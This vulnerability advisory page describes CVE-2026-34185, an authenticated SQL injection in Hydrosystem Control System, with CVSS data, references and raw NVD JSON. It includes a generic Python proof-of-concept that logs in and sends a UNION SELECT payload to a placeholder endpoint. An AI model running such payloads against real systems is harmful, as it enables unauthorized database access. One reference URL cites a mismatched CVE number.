CVE-2026-34185

Description

Hydrosystem Control System is vulnerable to SQL Injection across most scripts and input parameters. Because no protections are in place, an authenticated attacker can inject arbitrary SQL commands, potentially gaining full control over the database.This issue was fixed in Hydrosystem Control System version 9.8.5

CVSS Details

CVSS Score

8.8

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:hydrosystem.poznan:control_system:*:*:*:*:*:*:*:* - VULNERABLE

Hydrosystem Control System < 9.8.5

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# Target URL configuration
target_url = "http://target-hydrosystem/vulnerable_endpoint"
login_url = "http://target-hydrosystem/login"

# Attacker credentials with low privilege
credentials = {
    "username": "low_priv_user",
    "password": "password123"
}

# Initialize session to maintain cookies
session = requests.Session()

try:
    # Step 1: Authenticate to the system
    print("[*] Attempting to login...")
    login_resp = session.post(login_url, data=credentials)
    if login_resp.status_code != 200:
        print("[-] Login failed")
        exit()
    print("[+] Login successful")

    # Step 2: Exploit SQL Injection
    # The application does not sanitize input, allowing arbitrary SQL commands.
    # Payload attempts to extract the database version.
    injection_payload = "1' UNION ALL SELECT NULL, version(), NULL-- -"
    
    params = {
        "id": injection_payload  # Vulnerable parameter 'id'
    }

    print(f"[*] Sending payload: {injection_payload}")
    exploit_resp = session.get(target_url, params=params)

    # Step 3: Check for exploitation indicators
    if exploit_resp.status_code == 200:
        print("[+] Request sent successfully.")
        # Analyze response content for database version or errors
        if "mysql" in exploit_resp.text.lower() or "postgres" in exploit_resp.text.lower():
            print("[+] Potential SQL Injection confirmed based on response.")
        else:
            print("[!] Response received, verify output manually.")
    else:
        print("[-] Exploit request failed")

except Exception as e:
    print(f"[-] An error occurred: {e}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-34185
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-34185
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-34185/
[4] VulDB https://vuldb.com/cve/CVE-2026-34185
[5] https://cert.pl/posts/2026/04/CVE-2026-4901/
[6] https://www.hydrosystem.poznan.pl/

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-34185", "sourceIdentifier": "[email protected]", "published": "2026-04-09T10:16:22.260", "lastModified": "2026-04-20T17:05:51.550", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Hydrosystem Control System is vulnerable to SQL Injection across most scripts and input parameters. Because no protections are in place, an authenticated attacker can inject arbitrary SQL commands, potentially gaining full control over the database.This issue was fixed in Hydrosystem Control System version 9.8.5"}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:hydrosystem.poznan:control_system:*:*:*:*:*:*:*:*", "versionEndExcluding": "9.8.5", "matchCriteriaId": "C9D6B388-FD5C-486B-9493-E99D5499652D"}]}]}], "references": [{"url": "https://cert.pl/posts/2026/04/CVE-2026-4901/", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.hydrosystem.poznan.pl/", "source": "[email protected]", "tags": ["Product"]}]}}